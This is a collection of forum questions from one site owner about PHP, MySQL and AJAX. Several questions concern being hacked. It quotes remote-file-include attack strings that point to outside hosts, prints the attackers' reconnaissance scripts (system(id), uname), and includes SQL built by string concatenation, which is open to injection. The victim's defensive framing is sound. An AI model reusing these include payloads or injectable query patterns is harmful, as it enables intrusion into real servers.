n8w

problem solved .. here is a super easy way to add one ALTER TABLE portfolio_n8w ADD portfolio_id INT UNSIGNED NOT NULL AUTO_INCREMENT UNIQUE

I forgot to put a primary key column in one of my tables so when I tried to insert one called portfolio_id (int) auto_increment it won't let me do it because it says there is duplicate values is there an easy way to insert a primary key column with auto increment? If not .. I figure I need to insert a column and update the values with a php script and then make it the primary key once the values are unique? which everything goes smoothly up until the number 127 .. then it puts the value 127 for everything after ... 127 $sql = 'SELECT * FROM portfolio_n8w LIMIT 500'; $retid = mysql_query($sql) or die(mysql_error()); while ($row = mysql_fetch_array($retid)){ $counter++; $title = $row["title"]; $sql2 = 'UPDATE portfolio_n8w SET' . ' portfolio_id = "'.$counter.'"' . ' WHERE' . ' title = "'.$title.' " LIMIT 1'; $retid2 = mysql_query($sql2) or die(mysql_error()); }

I am sure I am doing this the long way... Is there a way to delete all records from multiple tables with one sql statement? right now I am doing it like this if( $user_id){ echo "Account Deleted"; //delete users $sql = 'DELETE FROM users WHERE user_id = "'.$user_id.'" LIMIT 1'; $retid = mysql_query($sql); # check for errors if (!$retid) { $error.=( mysql_error()); $error.= "fail"; } //delete illustrator $sql2 = 'DELETE FROM illustrators_table WHERE user_id = "'.$user_id.'" LIMIT 1'; $retid2 = mysql_query($sql2); # check for errors if (!$retid2) { $error.=( mysql_error()); $error.= "fail"; } }

I just want to make sure my data is clean going into the database and legible going out .. would this function work? //in function going_in($text){ $text = trim($text); $text = mysql_real_escape_string($text); $text=htmlentities($text); return $text; } //out function going_out($text){ $text = stripslashes($text); $text = html_entity_decode($text); return $text; }

I am using an api and I need to get the results into a variable? how I takes the results from the web page and turn it into a php variable? something like $bit_request = geturl('http://api.bit.ly/shorten?return_results');

awesome!!!!!! works like a charm .. thanks so much premiso

thanks I did .. but I still am not sure how to get this into a variable http://bit.ly/e4miJ object(stdClass)#1 (4) { ["errorCode"]=> int(0) ["errorMessage"]=> string(0) "" ["results"]=> object(stdClass)#2 (1) { ["http://www.n8w.com/image/art/witchcraft/"]=> object(stdClass)#3 (4) { ["hash"]=> string(5) "IB0iS" ["shortKeywordUrl"]=> string(0) "" ["shortUrl"]=> string(19) "http://bit.ly/e4miJ" ["userHash"]=> string(5) "e4miJ" } } ["statusCode"]=> string(2) "OK" } array(4) { ["errorCode"]=> int(0) ["errorMessage"]=> string(0) "" ["results"]=> array(1) { ["http://www.n8w.com/image/art/witchcraft/"]=> array(4) { ["hash"]=> string(5) "IB0iS" ["shortKeywordUrl"]=> string(0) "" ["shortUrl"]=> string(19) "http://bit.ly/e4miJ" ["userHash"]=> string(5) "e4miJ" } } ["statusCode"]=> string(2) "OK" }

I know whats in the object .. I just can't seem to figure out the syntax to get the variable I need .. it's an object within an object print $obj->{'errorCode'}; this prints "0" but what I need is print $obj->{'results.child.child.shortUrl'} which should print "http://bit.ly/e4miJ"

I am trying to get part of an object into a variable .. but I am not sure how to access it this doesn't seem to work?? print $obj->results['shortUrl']; // 12345 how can I do this? $myvar="http://bit.ly/e4miJ";(I want to extract this part of the object) thanks!!!!!!!!! <? $json = '{ "errorCode": 0, "errorMessage": "", "results": { "http://www.n8w.com/image/art/witchcraft/": { "hash": "IB0iS", "shortKeywordUrl": "", "shortUrl": "http://bit.ly/e4miJ", "userHash": "e4miJ" } }, "statusCode": "OK" }'; $obj = json_decode($json); print $obj->results['shortUrl']; // 12345 ?>

$ip=$_SERVER["REMOTE_ADDR"] ;

Can someone please tell me how I can take this exact where but order it by the table.field "favorites.added_date" if($peoplelike){ $sql='SELECT a.* , c.*, d.*, l.printable_name,l.numcode FROM illustrators_table a INNER JOIN users d ON a.user_id = d.user_id LEFT JOIN country l ON d.country_id = l.numcode INNER JOIN (SELECT * from favorites where illustrator_id = "'.$peoplelike.'" GROUP BY user_id) c ON a.user_id = c.user_id WHERE visible = "t" && s_verified = "t" ORDER BY a.count_clicks ASC '; $sql_pagination = $sql; $sql = $sql. ' LIMIT ' . $offset . ',' . $page_limit; } I tried the following but it gives me the error unknown table WHERE visible = "t" && s_verified = "t" ORDER BY favorites.add_date ASC '; Thanks!!!!!

wow .. that is awesome .. thanks!

What is the best way to convert a non-encrypted column in a database? to and encrypted column using md5? Thanks!

never mind .. simple mistake

my ajax script makes a call to a script like so: admin_favorites.php?f=1&illustrator_id=someid&user_id=someotherid how do I make this secure so that a user can't just browse to http://www.mysite.com/admin_favorites.php?f=1&illustrator_id=someid&user_id=bad_id and put false data? I was using their session id but it doesn't work when calling the ajax script so I guess I need to put it in the query string?

Here is the code .. I am trying to figure out how I can get the processResponse() function the qid? because the event handler doesn't allow me to pass arguments http.onreadystatechange = processResponse; but I need to so it knows which div to pass the response back to document.getElementById(qid).innerHTML = response; <html> <body> <script language="Javascript" type="text/javascript"> <!-- function createRequestObject() { var tmpXmlHttpObject; //depending on what the browser supports, use the right way to create the XMLHttpRequest object if (window.XMLHttpRequest) { // Mozilla, Safari would use this method ... tmpXmlHttpObject = new XMLHttpRequest(); } else if (window.ActiveXObject) { // IE would use this method ... tmpXmlHttpObject = new ActiveXObject("Microsoft.XMLHTTP"); } return tmpXmlHttpObject; } //call the above function to create the XMLHttpRequest object var http = createRequestObject(); function makeGetRequest(qid) { //make a connection to the server ... specifying that you intend to make a GET request //to the server. Specifiy the page name and the URL parameters to send http.open('get', 'ajax2.php?q_user_id=' + qid); //assign a handler for the response http.onreadystatechange = processResponse; //actually send the request to the server http.send(null); } function processResponse() { //check if the response has been received from the server if(http.readyState == 4){ //read and assign the response from the server var response = http.responseText; //do additional parsing of the response, if needed //in this case simply assign the response to the contents of the <div> on the page. document.getElementById(qid).innerHTML = response; //If the server returned an error message like a 404 error, that message would be shown within the div tag!!. //So it may be worth doing some basic error before setting the contents of the <div> } } --> </script> <h1>Have you heard these terms before?</h1> <p> Ceraunophobia <a href="javascript:makeGetRequest(1699)">More about Ceraunophobia</a><br> Astraphobia <a href="javascript:makeGetRequest(2245)">More about Astraphobia</a><br> Ophidiophobia <a href="javascript:makeGetRequest(3547)">More about Ophidiophobia</a><br> </p> <div id="f1699"></div> </body> </html>

in javascript how do you assign an event handler with arguments it works like this ... but I would like to pass arguments to the processResponse function http.onreadystatechange = processResponse; but ideally I would like to do something like this http.onreadystatechange = processResponse(argument1, argument2, etc);

I currently keep track of external click throughs on my site using a POST form that goes to a php script that looks up the id and then sends the user to the url and counts them as a click if they haven't already been to that link. (based on their ip and user-agent) Is this the best way to approach this? I am sure there is a better way. I am thinking it might be better to use the onclick event so seach engines can follow the links on my site example instead of using a form like this <form action="go.php" method="post" name="frmMyForm8037" target="_blank"> <a href="JavaScript:document.frmMyForm8037.submit();"> <img src="../../images/illustrators/8037.jpg" alt="Matte Stephens" width="190" height="190" border="0" /></a><br /> <input type="hidden" value="8037" name="user_id" /> <input type="hidden" value="ae1c65bbc4e2eb5bcd269273bc80ff4c" name="token" /> </form> use onclick like this <a href="http://www.mattestephens.com" onclick="go.php?user_id=8037&token= ae1c65bbc4e2eb5bcd269273bc80ff4c"> <img src="../../images/illustrators/8037.jpg" alt="Matte Stephens" width="190" height="190" border="0" /></a> How would you approach this with the following things in mind_ seach engines can follow my links clean/simple people can't cheat by clicking a billion times on one link to make it rank higher

I made a lot of changes to my php.ini $parm[] = "register_globals = Off"; $parm[] = "session.use_trans_sid = 0"; $parm[] = "display_errors = Off"; $parm[] = "log_errors = on"; $parm[] = "error_log = /home/username/phperrors.log"; $parm[] = "allow_url_fopen = Off"; $parm[] = "allow_url_include = Off"; $parm[] = "session.save_path = /home/username/public_html/secretfolder"; $parm[] = "upload_tmp_dir = /home/username/public_html/secretfolder"; $parm[] = "upload_max_filesize = 1M"; and .htaccess #don't view files with the .inc extention <Files ~ "\.inc$"> Order allow,deny Deny from all </Files> #Preventing remote file include attacks with mod rewrite RewriteCond %{QUERY_STRING} (.*)(http|https|ftp):\/\/(.*) RewriteRule ^(.+)$ - [F]

I have been having problems with hackers lately. Can you please tell me exactly what this means? I assume there is something insecure in my 3rd party poll? correct? I mad a ton of changes to my site yesterday .. and although they were not able to insert stuff on to my pages like before I got these errors in my error log [21-Jun-2008 07:54:37] PHP Warning: include() [<a href='function.include'>function.include</a>]: URL file-access is disabled in the server configuration in /home/user99/public_html/poll/errors.php on line 1 [21-Jun-2008 07:54:37] PHP Warning: include(http://queb3.info/cruise/tnet-id.txt???/errors.php) [<a href='function.include'>function.include</a>]: failed to open stream: no suitable wrapper could be found in /home/user99/public_html/poll/errors.php on line 1 [21-Jun-2008 07:54:37] PHP Warning: include() [<a href='function.include'>function.include</a>]: Failed opening 'http://queb3.info/cruise/tnet-id.txt???/errors.php' for inclusion (include_path='.:/usr/lib/php When I went to the url and this is what is says <? echo "BraT<br>"; $alb = @php_uname(); $alb2 = system(uptime); $alb3 = system(id); $alb4 = @getcwd(); $alb5 = getenv("SERVER_SOFTWARE"); $alb6 = phpversion(); $alb7 = $_SERVER['SERVER_NAME']; $alb8 = gethostbyname($SERVER_ADDR); $alb9 = get_current_user(); $os = @PHP_OS; echo "os: $os<br>"; echo "uname -a: $alb<br>"; echo "uptime: $alb2<br>"; echo "id: $alb3<br>"; echo "pwd: $alb4<br>"; echo "user: $alb9<br>"; echo "phpv: $alb6<br>"; echo "SoftWare: $alb5<br>"; echo "ServerName: $alb7<br>"; echo "ServerAddr: $alb8<br>"; echo "NigeriaN HackerS TeaM<br>"; exit; ?> I assume there is something insecure in my 3rd party poll? correct?

well ...it mainly serves as a link portal with a searchable database and a way to upload images

ahh ... what is the best way to avoid hacks? my site recently was hacked to pieces ... I am working on a sanitizing function and magic_quotes for sql injection .. but I am wondering if I should use something like http://htmlpurifier.org/comparison.html or if that is overkill? cause ideally I would like to avoid using 3rd party stuff

Here is a 404 i received Page Requested: www.n8w.com//pear/PEAR/Frontend/CLI.php.php?mosConfig_absolute_path=http://web2.mars52.plusserver.de/contenido44/kurz/js/helpid.txt??? When I checked out the page it has this ... what is the hacker actually trying to do? <?php function ConvertBytes($number) { $len = strlen($number); if($len < 4) { return sprintf("%d b", $number); } if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); } if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); } return sprintf("%0.2f Gb", $number/1024/1024/1024); } echo "Osirys<br>"; $un = @php_uname(); $id1 = system(id); $pwd1 = @getcwd(); $free1= diskfreespace($pwd1); $free = ConvertBytes(diskfreespace($pwd1)); if (!$free) {$free = 0;} $all1= disk_total_space($pwd1); $all = ConvertBytes(disk_total_space($pwd1)); if (!$all) {$all = 0;} $used = ConvertBytes($all1-$free1); $os = @PHP_OS; echo "0sirys was here ..<br>"; echo "uname -a: $un<br>"; echo "os: $os<br>"; echo "id: $id1<br>"; echo "free: $free<br>"; echo "used: $used<br>"; echo "total: $all<br>"; exit;

I am using it ... the reason I prefer to use $_SERVER vs. $_GET is because there are another parameters that I want to capture so I can do that more easily $_SERVER['QUERY_STRING'] but I just want to make sure its not hackable like $_GET is

well ... the reason I ask is because I need to figure out the pagination base on the query ... so I actually need to use the same query ... but I want to make sure there is not a chance to highjack this variable $_SERVER['QUERY_STRING']